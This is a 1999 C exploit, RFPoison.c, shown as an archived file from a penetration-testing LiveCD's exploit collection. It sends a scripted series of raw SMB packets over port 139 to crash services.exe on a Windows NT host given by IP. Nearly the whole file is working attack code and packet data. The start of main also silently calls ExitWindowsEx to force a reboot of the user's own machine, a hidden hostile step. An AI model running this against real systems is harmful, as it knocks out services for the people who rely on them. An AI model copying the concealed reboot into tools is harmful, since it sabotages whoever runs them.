home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / RFPoison.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  6.9 KB  |  193 lines
  1. /*      RFPoison.c - rain forest puppy - Oct 1999
  2.  
  3.         Kills services.exe on NT boxen, which breaks a lot of stuff */
  4.  
  5. #include <winsock.h>
  6. #include <stdio.h>
  7. #include <string.h>
  8.  
  9. void ipc_send ( char tosend[], int inc);
  10. void usage (void);
  11. void dosteps (void);
  12.  
  13. /* there's some inital repeated patterns, but separating them out
  14.    and adjusting the few different bytes in the middle would only
  15.    save about 50 bytes total, so screw it...I just leave full
  16.    sessions/packets/requests */
  17.  
  18. /* session setup */
  19. char setup[]="\x81\x00\x00\x48\x20\x43\x4b\x46\x44\x45"
  20. "\x4e\x45\x43\x46\x44\x45\x46\x46\x43\x46\x47\x45\x46\x46\x43\x43"
  21. "\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x00\x20\x45\x48\x45"
  22. "\x42\x46\x45\x45\x46\x45\x4c\x45\x46\x45\x46\x46\x41\x45\x46\x46"
  23. "\x43\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00\x00\x00"
  24. "\x00\x00";
  25.  
  26. /* dialect select */
  27. char dialect[]="\x00\x00\x00\xa4\xff\x53\x4d\x42\x72\x00"
  28. "\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  29. "\x00\x00\x00\x00\xf4\x01\x00\x00\x01\x00\x00\x81\x00\x02\x50\x43"
  30. "\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d"
  31. "\x20\x31\x2e\x30\x00\x02\x4d\x49\x43\x52\x4f\x53\x4f\x46\x54\x20"
  32. "\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x31\x2e\x30\x33\x00\x02\x4d"
  33. "\x49\x43\x52\x4f\x53\x4f\x46\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b"
  34. "\x53\x20\x33\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30"
  35. "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x53\x61\x6d"
  36. "\x62\x61\x00\x02\x4e\x54\x20\x4c\x41\x4e\x4d\x41\x4e\x20\x31\x2e"
  37. "\x30\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";
  38.  
  39. /* setup account */
  40. char account[]="\x00\x00\x00\x54\xff\x53\x4d\x42\x73\x00"
  41. "\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  42. "\x00\x00\x00\x00\xf4\x01\x00\x00\x01\x00\x0d\xff\x00\x00\x00\xff"
  43. "\xff\x02\x00\xf4\x01\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00"
  44. "\x00\x00\x00\x00\x00\x17\x00\x00\x00\x57\x4f\x52\x4b\x47\x52\x4f"
  45. "\x55\x50\x00\x55\x6e\x69\x78\x00\x53\x61\x6d\x62\x61\x00";
  46.  
  47. /* connect to IPC */
  48. char ipc[]="\x00\x00\x00\x42\xff\x53\x4d\x42\x75\x00"
  49. "\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  50. "\x00\x00\x00\x00\xf4\x01\x00\x08\x01\x00\x04\xff\x00\x00\x00\x00"
  51. "\x00\x01\x00\x17\x00\x00\x5c\x5c\x2a\x53\x4d\x42\x53\x45\x52\x56"
  52. "\x45\x52\x5c\x49\x50\x43\x24\x00\x49\x50\x43\x00";
  53.  
  54. /* connect to \srvsvc */
  55. char srvsvc[]="\x00\x00\x00\x5b\xff\x53\x4d\x42\xa2\x00"
  56. "\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  57. "\x00\x00\x00\x08\xf4\x01\x00\x08\x01\x00\x18\xff\x00\x00\x00\x00"
  58. "\x07\x00\x06\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00"
  59. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00"
  60. "\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x08\x00\x5c\x73\x72"
  61. "\x76\x73\x76\x63\x00";
  62.  
  63. /* transact:bind */
  64. char transact1[]="\x00\x00\x00\x94\xff\x53\x4d\x42\x25\x00"
  65. "\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  66. "\x00\x00\x00\x08\xf4\x01\x00\x08\x01\x00\x10\x00\x00\x48\x00\x00"
  67. "\x00\x48\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4c"
  68. "\x00\x48\x00\x4c\x00\x02\x00\x26\x00\x00\x08\x51\x00\x5c\x50\x49"
  69. "\x50\x45\x5c\x00\x00\x00\x05\x00\x0b\x00\x10\x00\x00\x00\x48\x00"
  70. "\x00\x00\x01\x00\x00\x00\x30\x16\x30\x16\x00\x00\x00\x00\x01\x00"
  71. "\x00\x00\x00\x00\x01\x00\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78"
  72. "\x5a\x47\xbf\x6e\xe1\x88\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c"
  73. "\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00";
  74.  
  75. /* transact:request share enumeration */
  76. char transact2[]="\x00\x00\x00\xa4\xff\x53\x4d\x42\x25\x00"
  77. "\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  78. "\x00\x00\x00\x08\xf4\x01\x00\x08\x01\x00\x10\x00\x00\x58\x00\x00"
  79. "\x00\x58\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4c"
  80. "\x00\x58\x00\x4c\x00\x02\x00\x26\x00\x00\x08\x61\x00\x5c\x50\x49"
  81. "\x50\x45\x5c\x00\x00\x00\x05\x00\x00\x03\x10\x00\x00\x00\x58\x00"
  82. "\x00\x00\x02\x00\x00\x00\x48\x00\x00\x00\x00\x00\x0f\x00\x01\x00"
  83. "\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x5c\x00"
  84. "\x5c\x00\x2a\x00\x53\x00\x4d\x00\x42\x00\x53\x00\x45\x00\x52\x00"
  85. "\x56\x00\x45\x00\x52\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00"
  86. "\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00";
  87.  
  88. /* no, that's not shellcode!!! */
  89.  
  90. int sizes[]={76,168,88,70,95,152,168};
  91.  
  92. char buf[8000];
  93. int sox, connex;
  94. struct sockaddr_in ntsin;
  95.  
  96. int main(int argc, char *argv[]){
  97.  
  98. WORD wVersionRequested;
  99. WSADATA wsaData;
  100. int err;
  101. unsigned long crap;
  102.  
  103. err=ExitWindowsEx(6, crap);
  104. if(err != 0){
  105.     perror("Exitwin failed: ");
  106.     exit(1);}
  107.  
  108. printf("RFPoison - rain forest puppy - ADM - wiretrip\n");
  109. if (argc < 2 || argc > 2) usage();
  110. printf("Poisoning %s\n",argv[1]);
  111.  
  112.  
  113. wVersionRequested = MAKEWORD( 1, 1 );
  114.  
  115. err = WSAStartup( wVersionRequested, &wsaData );
  116. if ( err != 0 ) {
  117.     perror("WSAStartup puked: ");
  118.     exit(1);}
  119.  
  120. ntsin.sin_addr.s_addr = inet_addr(argv[1]);
  121. ntsin.sin_family      = AF_INET;
  122. ntsin.sin_port        = htons(139);
  123.  
  124. dosteps();
  125. printf("Poison packet sent.\n");
  126. return 0;
  127. } /* end main */
  128.  
  129.  
  130. void ipc_send ( char tosend[], int inc) {
  131.   int x;
  132.   send(sox, tosend, sizes[inc],0);  /* send request */
  133.   x=recv(sox,buf,7000,0);   /* get response   */
  134.  
  135.   if(x<1){
  136.         printf("Problem, didn't get response to step %i\n",inc);
  137.         closesocket(sox); exit(1);}
  138.  
  139.   if(buf[9]!='\x00'||buf[10] !='\x00'||buf[11]!='\x00'||buf[12]!='\x00') {
  140.         printf("Step %i failed.\n",inc);
  141.         if(inc==4) printf("Maybe already dead?\n");
  142.         closesocket(sox);
  143.         exit(1);}
  144.  
  145. return;} /* end ipc_send */
  146.  
  147. void usage (void) {
  148.   printf(       "\n\tusage: rfpoison <ip of target>\n"
  149.                 "\t\tNOTE IT'S IP, NOT DNS!\n"
  150.                 "\n\tProps:\n\n"
  151.                 "\tADM\t\t- elite people who have fun!\n"
  152.                 "\tw00w00\t\t- more elite people\n"
  153.                 "\t#rhino9\t\t- my friends will know who they are\n"
  154.                 "\twiretrip\t- who exactly are they?\n"
  155.                 "\tNMRC\t\t- definately no rest for the wicca'd\n"
  156.                 "\tAleph1\t\t- viva la full disclosure!\n"
  157.                 "\n\t+ all other individuals and groups I talk to\n\n");
  158.   exit(1);}
  159.  
  160.  
  161. void dosteps (void) {
  162.   sox = socket(AF_INET,SOCK_STREAM,0);
  163.   if (sox == INVALID_SOCKET){
  164.     perror("Socket problems: ");
  165.     exit(1);}
  166.  
  167.   if (connect(sox, (struct sockaddr *)&ntsin, sizeof(ntsin)) == SOCKET_ERROR){
  168.     perror("Problems connecting: ");
  169.     exit(1);}
  170.  
  171.   /* session setup */
  172.   send(sox,(char *)&setup,sizes[0],0);  /* send initial request */
  173.   connex=recv(sox,buf,8000,0);   /* get their response   */
  174.  
  175.   if(connex<1){
  176.         printf("Problem, didn't get response to setup\n");
  177.         closesocket(sox); exit(1);}
  178.  
  179.   if(buf[0] !='\x82') {
  180.         printf("Setup failed.\n"); closesocket(sox); exit(1);}
  181.  
  182.   /* steps */
  183.   ipc_send(dialect,1);
  184.   ipc_send(account,2);
  185.   ipc_send(ipc,3);
  186.   ipc_send(srvsvc,4);
  187.   ipc_send(transact1,5);
  188.  
  189.   /* enum - can't use ipc_send because the read will fail */
  190.   send(sox,(char *)&transact2,sizes[6],0);  /* send request */
  191.   closesocket(sox);
  192. }
  193. /*                   www.hack.co.za  [31 October 1999]*/